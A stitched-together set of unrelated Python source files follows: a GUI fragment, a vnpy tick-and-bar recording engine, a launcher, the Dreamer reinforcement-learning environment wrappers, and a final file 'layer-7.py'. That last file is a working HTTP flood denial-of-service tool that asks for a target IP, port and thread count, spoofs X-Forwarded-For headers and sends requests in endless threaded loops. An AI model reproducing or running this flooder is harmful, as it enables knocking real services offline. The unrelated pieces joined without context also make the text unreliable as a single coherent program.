self.process.stdin.write(config.xgen_status)
self.process.stdin.flush()
self.frame.after(100, self.get_output)
def get_logs(self):
self.flush_output()
self.process.stdin.write(config.xgen_gunicorn)
self.process.stdin.write(config.pwd)
self.process.stdin.flush()
self.frame.after(100, self.get_output)
def access_logs(self):
self.flush_output()
self.process.stdin.write(config.nginx_access)
self.process.stdin.write(config.pwd)
self.process.stdin.flush()
self.frame.after(100, self.get_output)
def logout(self):
self.process.stdin.write(b'exit\n')
self.process.stdin.flush()
self.process.terminate()
self.thread._stop_event.set()
|
drEngine.py
|
# encoding: UTF-8
'''
本文件中实现了行情数据记录引擎,用于汇总TICK数据,并生成K线插入数据库。
使用DR_setting.json来配置需要收集的合约,以及主力合约代码。
'''
import json
import csv
import os
import copy
import traceback
from collections import OrderedDict
from datetime import datetime, timedelta
from Queue import Queue, Empty
from threading import Thread
from pymongo.errors import DuplicateKeyError
from vnpy.event import Event
from vnpy.trader.vtEvent import *
from vnpy.trader.vtFunction import todayDate, getJsonPath
from vnpy.trader.vtObject import VtSubscribeReq, VtLogData, VtBarData, VtTickData
from vnpy.trader.app.ctaStrategy.ctaTemplate import BarGenerator
from .drBase import *
from .language import text
########################################################################
class DrEngine(object):
"""数据记录引擎"""
settingFileName = 'DR_setting.json'
settingFilePath = getJsonPath(settingFileName, __file__)
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine):
"""Constructor"""
self.mainEngine = mainEngine
self.eventEngine = eventEngine
# 当前日期
self.today = todayDate()
# 主力合约代码映射字典,key为具体的合约代码(如IF1604),value为主力合约代码(如IF0000)
self.activeSymbolDict = {}
# Tick对象字典
self.tickSymbolSet = set()
# K线合成器字典
self.bgDict = {}
# 配置字典
self.settingDict = OrderedDict()
# 负责执行数据库插入的单独线程相关
self.active = False # 工作状态
self.queue = Queue() # 队列
self.thread = Thread(target=self.run) # 线程
# 载入设置,订阅行情
self.loadSetting()
# 启动数据插入线程
self.start()
# 注册事件监听
self.registerEvent()
#----------------------------------------------------------------------
def loadSetting(self):
"""加载配置"""
with open(self.settingFilePath) as f:
drSetting = json.load(f)
# 如果working设为False则不启动行情记录功能
working = drSetting['working']
if not working:
return
# Tick记录配置
if 'tick' in drSetting:
l = drSetting['tick']
for setting in l:
symbol = setting[0]
gateway = setting[1]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = setting[0]
# 针对LTS和IB接口,订阅行情需要交易所代码
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
# 针对IB接口,订阅行情需要货币和产品类型
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, gateway)
#tick = VtTickData() # 该tick实例可以用于缓存部分数据(目前未使用)
#self.tickDict[vtSymbol] = tick
self.tickSymbolSet.add(vtSymbol)
# 保存到配置字典中
if vtSymbol not in self.settingDict:
d = {
'symbol': symbol,
'gateway': gateway,
'tick': True
}
self.settingDict[vtSymbol] = d
else:
d = self.settingDict[vtSymbol]
d['tick'] = True
# 分钟线记录配置
if 'bar' in drSetting:
l = drSetting['bar']
for setting in l:
symbol = setting[0]
gateway = setting[1]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = symbol
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, gateway)
# 保存到配置字典中
if vtSymbol not in self.settingDict:
d = {
'symbol': symbol,
'gateway': gateway,
'bar': True
}
self.settingDict[vtSymbol] = d
else:
d = self.settingDict[vtSymbol]
d['bar'] = True
# 创建BarManager对象
self.bgDict[vtSymbol] = BarGenerator(self.onBar)
# 主力合约记录配置
if 'active' in drSetting:
d = drSetting['active']
self.activeSymbolDict = {vtSymbol:activeSymbol for activeSymbol, vtSymbol in d.items()}
#----------------------------------------------------------------------
def getSetting(self):
"""获取配置"""
return self.settingDict, self.activeSymbolDict
#----------------------------------------------------------------------
def procecssTickEvent(self, event):
"""处理行情事件"""
tick = event.dict_['data']
vtSymbol = tick.vtSymbol
# 生成datetime对象
if not tick.datetime:
tick.datetime = datetime.strptime(' '.join([tick.date, tick.time]), '%Y%m%d %H:%M:%S.%f')
self.onTick(tick)
bm = self.bgDict.get(vtSymbol, None)
if bm:
bm.updateTick(tick)
#----------------------------------------------------------------------
def onTick(self, tick):
"""Tick更新"""
vtSymbol = tick.vtSymbol
if vtSymbol in self.tickSymbolSet:
self.insertData(TICK_DB_NAME, vtSymbol, tick)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(TICK_DB_NAME, activeSymbol, tick)
self.writeDrLog(text.TICK_LOGGING_MESSAGE.format(symbol=tick.vtSymbol,
time=tick.time,
last=tick.lastPrice,
bid=tick.bidPrice1,
ask=tick.askPrice1))
#----------------------------------------------------------------------
def onBar(self, bar):
"""分钟线更新"""
vtSymbol = bar.vtSymbol
self.insertData(MINUTE_DB_NAME, vtSymbol, bar)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(MINUTE_DB_NAME, activeSymbol, bar)
self.writeDrLog(text.BAR_LOGGING_MESSAGE.format(symbol=bar.vtSymbol,
time=bar.time,
open=bar.open,
high=bar.high,
low=bar.low,
close=bar.close))
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_TICK, self.procecssTickEvent)
#----------------------------------------------------------------------
def insertData(self, dbName, collectionName, data):
"""插入数据到数据库(这里的data可以是VtTickData或者VtBarData)"""
self.queue.put((dbName, collectionName, data.__dict__))
#----------------------------------------------------------------------
def run(self):
"""运行插入线程"""
while self.active:
try:
dbName, collectionName, d = self.queue.get(block=True, timeout=1)
# 这里采用MongoDB的update模式更新数据,在记录tick数据时会由于查询
# 过于频繁,导致CPU占用和硬盘读写过高后系统卡死,因此不建议使用
#flt = {'datetime': d['datetime']}
#self.mainEngine.dbUpdate(dbName, collectionName, d, flt, True)
# 使用insert模式更新数据,可能存在时间戳重复的情况,需要用户自行清洗
try:
self.mainEngine.dbInsert(dbName, collectionName, d)
except DuplicateKeyError:
self.writeDrLog(u'键值重复插入失败,报错信息:' %traceback.format_exc())
except Empty:
pass
#----------------------------------------------------------------------
def start(self):
"""启动"""
self.active = True
self.thread.start()
#----------------------------------------------------------------------
def stop(self):
"""退出"""
if self.active:
self.active = False
self.thread.join()
#----------------------------------------------------------------------
def writeDrLog(self, content):
"""快速发出日志事件"""
log = VtLogData()
log.logContent = content
event = Event(type_=EVENT_DATARECORDER_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
|
startProgram.py
|
"""
Starting point for running the program.
"""
from multiprocessing import Process
from MainWindow import start_main_win
from Utilities.IO.IOHelper import create_config_file,create_configt_file
if __name__ == '__main__':
create_config_file()
create_configt_file()
p = Process(target=start_main_win)
p.start()
p.join()
# start_main_win()
|
wrappers.py
|
# Copyright 2019 The Dreamer Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import datetime
import io
import os
import sys
import threading
import traceback
import uuid
import gym
import gym.spaces
import numpy as np
import skimage.transform
import tensorflow as tf
from dreamer import tools
class ObservationDict(object):
def __init__(self, env, key='observ'):
self._env = env
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = {self._key: self._env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {self._key: np.array(obs)}
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = {self._key: np.array(obs)}
return obs
class ConcatObservation(object):
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
spaces = [spaces[key] for key in self._keys]
low = np.concatenate([space.low for space in spaces], 0)
high = np.concatenate([space.high for space in spaces], 0)
dtypes = [space.dtype for space in spaces]
if not all(dtype == dtypes[0] for dtype in dtypes):
message = 'Spaces must have the same data type; are {}.'
raise KeyError(message.format(', '.join(str(x) for x in dtypes)))
return gym.spaces.Box(low, high, dtype=dtypes[0])
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = self._select_keys(obs)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = self._select_keys(obs)
return obs
def _select_keys(self, obs):
return np.concatenate([obs[key] for key in self._keys], 0)
class SelectObservations(object):
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
return gym.spaces.Dict({key: spaces[key] for key in self._keys})
@property
def action_space(self):
return self._env.action_space
def step(self, action, *args, **kwargs):
obs, reward, done, info = self._env.step(action, *args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs, reward, done, info
def reset(self, *args, **kwargs):
obs = self._env.reset(*args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs
class PixelObservations(object):
def __init__(
self, env, size=(64, 64), dtype=np.uint8, key='image',
render_mode='rgb_array'):
assert isinstance(env.observation_space, gym.spaces.Dict)
self._env = env
self._size = size
self._dtype = dtype
self._key = key
self._render_mode = render_mode
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
high = {np.uint8: 255, np.float: 1.0}[self._dtype]
image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype)
spaces = self._env.observation_space.spaces.copy()
assert self._key not in spaces
spaces[self._key] = image
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs[self._key] = self._render_image()
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs[self._key] = self._render_image()
return obs
def _render_image(self):
image = self._env.render(self._render_mode)
if image.shape[:2] != self._size:
kwargs = dict(
output_shape=self._size, mode='edge', order=1, preserve_range=True)
image = skimage.transform.resize(image, **kwargs).astype(image.dtype)
if self._dtype and image.dtype != self._dtype:
if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8:
image = (image * 255).astype(self._dtype)
elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64):
image = image.astype(self._dtype) / 255
else:
message = 'Cannot convert observations from {} to {}.'
raise NotImplementedError(message.format(image.dtype, self._dtype))
return image
class ObservationToRender(object):
def __init__(self, env, key='image'):
self._env = env
self._key = key
self._image = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return gym.spaces.Dict({})
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._image = obs.pop(self._key)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
self._image = obs.pop(self._key)
return obs
def render(self, *args, **kwargs):
return self._image
class OverwriteRender(object):
def __init__(self, env, render_fn):
self._env = env
self._render_fn = render_fn
self._env.render('rgb_array') # Set up viewer.
def __getattr__(self, name):
return getattr(self._env, name)
def render(self, *args, **kwargs):
return self._render_fn(self._env, *args, **kwargs)
class ActionRepeat(object):
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class NormalizeActions(object):
def __init__(self, env):
self._env = env
low, high = env.action_space.low, env.action_space.high
self._enabled = np.logical_and(np.isfinite(low), np.isfinite(high))
self._low = np.where(self._enabled, low, -np.ones_like(low))
self._high = np.where(self._enabled, high, np.ones_like(low))
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
space = self._env.action_space
low = np.where(self._enabled, -np.ones_like(space.low), space.low)
high = np.where(self._enabled, np.ones_like(space.high), space.high)
return gym.spaces.Box(low, high, dtype=space.dtype)
def step(self, action):
action = (action + 1) / 2 * (self._high - self._low) + self._low
return self._env.step(action)
class DeepMindControl(object):
metadata = {'render.modes': ['rgb_array']}
reward_range = (-np.inf, np.inf)
def __init__(self, domain, task, render_size=(64, 64), camera_id=0):
if isinstance(domain, str):
from dm_control import suite
self._env = suite.load(domain, task)
else:
assert task is None
self._env = domain()
self._render_size = render_size
self._camera_id = camera_id
@property
def observation_space(self):
components = {}
for key, value in self._env.observation_spec().items():
components[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
return gym.spaces.Dict(components)
@property
def action_space(self):
action_spec = self._env.action_spec()
return gym.spaces.Box(
action_spec.minimum, action_spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': time_step.discount}
if done:
info['done_reason'] = 'timeout'
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
return dict(time_step.observation)
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._env.physics.render(
*self._render_size, camera_id=self._camera_id)
class DeepMindLabyrinth(object):
ACTION_SET_DEFAULT = (
(0, 0, 0, 1, 0, 0, 0), # Forward
(0, 0, 0, -1, 0, 0, 0), # Backward
(0, 0, -1, 0, 0, 0, 0), # Strafe Left
(0, 0, 1, 0, 0, 0, 0), # Strafe Right
(-20, 0, 0, 0, 0, 0, 0), # Look Left
(20, 0, 0, 0, 0, 0, 0), # Look Right
(-20, 0, 0, 1, 0, 0, 0), # Look Left + Forward
(20, 0, 0, 1, 0, 0, 0), # Look Right + Forward
(0, 0, 0, 0, 1, 0, 0), # Fire
)
ACTION_SET_MEDIUM = (
(0, 0, 0, 1, 0, 0, 0), # Forward
(0, 0, 0, -1, 0, 0, 0), # Backward
(0, 0, -1, 0, 0, 0, 0), # Strafe Left
(0, 0, 1, 0, 0, 0, 0), # Strafe Right
(-20, 0, 0, 0, 0, 0, 0), # Look Left
(20, 0, 0, 0, 0, 0, 0), # Look Right
(0, 0, 0, 0, 0, 0, 0), # Idle.
)
ACTION_SET_SMALL = (
(0, 0, 0, 1, 0, 0, 0), # Forward
(-20, 0, 0, 0, 0, 0, 0), # Look Left
(20, 0, 0, 0, 0, 0, 0), # Look Right
)
def __init__(
self, level, mode, render_size=(64, 64), action_repeat=4,
action_set=ACTION_SET_DEFAULT, level_cache=None, seed=None,
runfiles_path=None):
assert mode in ('train', 'test')
import deepmind_lab
if runfiles_path:
print('Setting DMLab runfiles path:', runfiles_path)
deepmind_lab.set_runfiles_path(runfiles_path)
self._config = {}
self._config['width'] = render_size[0]
self._config['height'] = render_size[1]
self._config['logLevel'] = 'WARN'
if mode == 'test':
self._config['allowHoldOutLevels'] = 'true'
self._config['mixerSeed'] = 0x600D5EED
self._action_repeat = action_repeat
self._random = np.random.RandomState(seed)
self._env = deepmind_lab.Lab(
level=level,
observations=['RGB_INTERLEAVED'],
config={k: str(v) for k, v in self._config.items()},
level_cache=level_cache)
self._action_set = action_set
self._last_image = None
self._done = True
@property
def observation_space(self):
shape = (self._config['height'], self._config['width'], 3)
space = gym.spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
return gym.spaces.Dict({'image': space})
@property
def action_space(self):
return gym.spaces.Discrete(len(self._action_set))
def reset(self):
self._done = False
self._env.reset(seed=self._random.randint(0, 2 ** 31 - 1))
obs = self._get_obs()
return obs
def step(self, action):
raw_action = np.array(self._action_set[action], np.intc)
reward = self._env.step(raw_action, num_steps=self._action_repeat)
self._done = not self._env.is_running()
obs = self._get_obs()
return obs, reward, self._done, {}
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._last_image
def close(self):
self._env.close()
def _get_obs(self):
if self._done:
image = 0 * self._last_image
else:
image = self._env.observations()['RGB_INTERLEAVED']
self._last_image = image
return {'image': image}
class LocalLevelCache(object):
def __init__(self, cache_dir='/tmp/level_cache'):
self._cache_dir = cache_dir
tf.gfile.MakeDirs(cache_dir)
def fetch(self, key, pk3_path):
path = os.path.join(self._cache_dir, key)
if tf.gfile.Exists(path):
tf.gfile.Copy(path, pk3_path, overwrite=True)
return True
return False
def write(self, key, pk3_path):
path = os.path.join(self._cache_dir, key)
if not tf.gfile.Exists(path):
tf.gfile.Copy(pk3_path, path)
class Atari(object):
# LOCK = multiprocessing.Lock()
LOCK = threading.Lock()
def __init__(
self, name, action_repeat=4, size=(84, 84), grayscale=True, noops=30,
life_done=False, sticky_actions=True):
import gym
version = 0 if sticky_actions else 4
with self.LOCK:
self._env = gym.make('{}NoFrameskip-v{}'.format(name, version))
self._action_repeat = action_repeat
self._size = size
self._grayscale = grayscale
self._noops = noops
self._life_done = life_done
self._lives = None
shape = self._env.observation_space.shape[:2] + (() if grayscale else (3,))
self._buffers = [np.empty(shape, dtype=np.uint8) for _ in range(2)]
self._random = np.random.RandomState(seed=None)
@property
def observation_space(self):
shape = self._size + (1 if self._grayscale else 3,)
space = gym.spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
return gym.spaces.Dict({'image': space})
@property
def action_space(self):
return self._env.action_space
def close(self):
return self._env.close()
def reset(self):
with self.LOCK:
self._env.reset()
# Use at least one no-op.
noops = self._random.randint(1, self._noops) if self._noops > 1 else 1
for _ in range(noops):
done = self._env.step(0)[2]
if done:
with self.LOCK:
self._env.reset()
self._lives = self._env.ale.lives()
if self._grayscale:
self._env.ale.getScreenGrayscale(self._buffers[0])
else:
self._env.ale.getScreenRGB2(self._buffers[0])
self._buffers[1].fill(0)
return self._get_obs()
def step(self, action):
total_reward = 0.0
for step in range(self._action_repeat):
_, reward, done, info = self._env.step(action)
total_reward += reward
if self._life_done:
lives = self._env.ale.lives()
done = done or lives < self._lives
self._lives = lives
if done:
# In principle, the loop could exit before two valid frames have been
# rendered.
break
elif step >= self._action_repeat - 2:
index = step - (self._action_repeat - 2)
if self._grayscale:
self._env.ale.getScreenGrayscale(self._buffers[index])
else:
self._env.ale.getScreenRGB2(self._buffers[index])
obs = self._get_obs()
return obs, total_reward, done, info
def render(self, mode):
return self._env.render(mode)
def _get_obs(self):
if self._action_repeat > 1:
np.maximum(self._buffers[0], self._buffers[1], out=self._buffers[0])
image = skimage.transform.resize(
self._buffers[0], output_shape=self._size, mode='edge', order=1,
preserve_range=True)
image = np.clip(image, 0, 255).astype(np.uint8)
image = image[:, :, None] if self._grayscale else image
return {'image': image}
class OneHotAction(object):
def __init__(self, env, strict=True):
assert isinstance(env.action_space, gym.spaces.Discrete)
self._env = env
self._strict = strict
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = (self._env.action_space.n,)
return gym.spaces.Box(low=0, high=1, shape=shape, dtype=np.float32)
def step(self, action):
index = np.argmax(action).astype(int)
if self._strict:
reference = np.zeros_like(action)
reference[index] = 1
assert np.allclose(reference, action), action
return self._env.step(index)
def reset(self):
return self._env.reset()
class MaximumDuration(object):
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
if 'done_reason' not in info:
info['done_reason'] = 'timeout'
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class MinimumDuration(object):
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step < self._duration:
done = False
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ProcessObservation(object):
def __init__(self, env, process_fn):
self._env = env
self._process_fn = process_fn
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return tools.nested.map(
lambda box: gym.spaces.Box(
self._process_fn(box.low),
self._process_fn(box.high),
dtype=self._process_fn(box.low).dtype),
self._env.observation_space)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = self._process_fn(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = self._process_fn(observ)
return observ
class PadActions(object):
def __init__(self, env, spaces):
self._env = env
self._action_space = self._pad_box_space(spaces)
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action, *args, **kwargs):
action = action[:len(self._env.action_space.low)]
return self._env.step(action, *args, **kwargs)
def reset(self, *args, **kwargs):
return self._env.reset(*args, **kwargs)
def _pad_box_space(self, spaces):
assert all(len(space.low.shape) == 1 for space in spaces)
length = max(len(space.low) for space in spaces)
low, high = np.inf * np.ones(length), -np.inf * np.ones(length)
for space in spaces:
low[:len(space.low)] = np.minimum(space.low, low[:len(space.low)])
high[:len(space.high)] = np.maximum(space.high, high[:len(space.high)])
return gym.spaces.Box(low, high, dtype=np.float32)
class ObservationDropout(object):
def __init__(self, env, key, prob):
self._env = env
self._key = key
self._prob = prob
self._random = np.random.RandomState(seed=0)
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = self._process_fn(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = self._process_fn(observ)
return observ
def _process_fn(self, observ):
if self._random.uniform(0, 1) < self._prob:
observ[self._key] *= 0
return observ
class CollectDataset(object):
def __init__(self, env, outdir):
self._env = env
self._outdir = outdir and os.path.expanduser(outdir)
self._episode = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action, *args, **kwargs):
if kwargs.get('blocking', True):
transition = self._env.step(action, *args, **kwargs)
return self._process_step(action, *transition)
else:
future = self._env.step(action, *args, **kwargs)
return lambda: self._process_step(action, *future())
def reset(self, *args, **kwargs):
if kwargs.get('blocking', True):
observ = self._env.reset(*args, **kwargs)
return self._process_reset(observ)
else:
future = self._env.reset(*args, **kwargs)
return lambda: self._process_reset(future())
def _process_step(self, action, observ, reward, done, info):
transition = self._process_observ(observ).copy()
transition['action'] = action
transition['reward'] = reward
if done:
reason = info.get('done_reason', 'termination')
transition['pcont'] = dict(termination=0.0, timeout=1.0)[reason]
else:
transition['pcont'] = 1.0
self._episode.append(transition)
if done:
episode = self._get_episode()
if self._outdir:
filename = self._get_filename(episode)
self._write(episode, filename)
return observ, reward, done, info
def _process_reset(self, observ):
# Resetting the environment provides the observation for time step zero.
# The action and reward are not known for this time step, so we zero them.
transition = self._process_observ(observ).copy()
transition['action'] = np.zeros_like(self.action_space.low)
transition['reward'] = 0.0
transition['pcont'] = 1.0
self._episode = [transition]
return observ
def _process_observ(self, observ):
if not isinstance(observ, dict):
observ = {'observ': observ}
return observ
def _get_filename(self, episode):
timestamp = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')
identifier = str(uuid.uuid4().hex)
length = len(episode['reward'])
filename = '{}-{}-{}.npz'.format(timestamp, identifier, length)
filename = os.path.join(self._outdir, filename)
return filename
def _get_episode(self):
episode = {k: [t[k] for t in self._episode] for k in self._episode[0]}
episode = {k: np.array(v) for k, v in episode.items()}
for key, sequence in episode.items():
if sequence.dtype not in (np.uint8, np.float32, np.float64, np.bool):
message = "Sequence for key {} is of unexpected type {}:\n{}"
raise RuntimeError(message.format(key, sequence.dtype, sequence))
return episode
def _write(self, episode, filename):
if not tf.gfile.Exists(self._outdir):
tf.gfile.MakeDirs(self._outdir)
with io.BytesIO() as file_:
np.savez_compressed(file_, **episode)
file_.seek(0)
with tf.gfile.Open(filename, 'w') as ff:
ff.write(file_.read())
folder = os.path.basename(self._outdir)
name = os.path.splitext(os.path.basename(filename))[0]
word = 'with' if np.sum(episode.get('reward_mask', 1)) > 0 else 'without'
score = episode['reward'].sum()
message = 'Recorded episode {} of length {} {} score of {:.1f} to {}.'
print(message.format(name, len(episode['action']), word, score, folder))
class NoRewardHint(object):
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces.copy()
low = np.zeros(1, dtype=np.float32)
high = np.ones(1, dtype=np.float32)
spaces['reward_mask'] = gym.spaces.Box(low, high)
return gym.spaces.Dict(spaces)
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs['reward_mask'] = np.zeros(1, dtype=np.float32)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs['reward_mask'] = np.zeros(1, dtype=np.float32)
return obs
class ConvertTo32Bit(object):
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = tools.nested.map(self._convert_observ, observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = tools.nested.map(self._convert_observ, observ)
return observ
def _convert_observ(self, observ):
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class Async(object):
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor, strategy='thread'):
if strategy == 'thread':
import multiprocessing.dummy as mp
elif strategy == 'process':
import multiprocessing as mp
else:
raise NotImplementedError(strategy)
self._strategy = strategy
self._conn, conn = mp.Pipe()
self._process = mp.Process(target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
try:
message, payload = self._conn.recv()
except (OSError, EOFError):
raise RuntimeError('Lost connection to environment worker.')
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception:
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
print('Error in environment process: {}'.format(stacktrace))
try:
conn.send((self._EXCEPTION, stacktrace))
except Exception:
print('Failed to send exception back to main process.')
try:
conn.close()
except Exception:
print('Failed to properly close connection.')
|
layer-7.py
|
# Udah Recode aja Intinya Credit
import socket
import os, sys
import time
import threading, random
print("""
[ - ]====================[ - ]
[ ! ] Layer-7 [HTTP-Flooder]
[ ! ] Coded By NumeX
[ ! ] Made with Love -/
[ - ]====================[ - ]
\n""")
ip = input("[ ? ] Enter IP Target : ")
ip = socket.gethostbyname(ip)
port = int(input("[ ? ] Port : "))
times = int(input("[ ? ] How long you wanna attack : "))
run = int(input("[ ? ] Runner : "))
url = "http://" + str(ip)
def randomip():
randip = []
randip1 = random.randint(1,255)
randip2 = random.randint(1,255)
randip3 = random.randint(1,255)
randip4 = random.randint(1,255)
randip.append(randip1)
randip.append(randip2)
randip.append(randip3)
randip.append(randip4)
randip = str(randip[0]) + "." + str(randip[1]) + "." + str(randip[2]) + "." + str(randip[3])
return(randip)
print('[</>] Start Attacking {} [</>]'.format(ip))
# i Dont Loop it, cuz i scared the tools is overloads lol
time.sleep(1)
def startAttack():
connection = "Connection: null\r\n"
referer = "Referer: null\r\n"
forward = "X-Forwarded-For: " + randomip() + "\r\n"
get_host = "HEAD " + url + " HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + referer + connection + forward + "\r\n\r\n"
while True:
try:
atk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
atk.connect((ip, port))
for y in range(times): # Start attack
atk.send(str.encode(request))
except socket.error:
time.sleep(.1)
except:
pass
if __name__ == "__main__":
for i in range(run):
th = threading.Thread(target=startAttack).start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.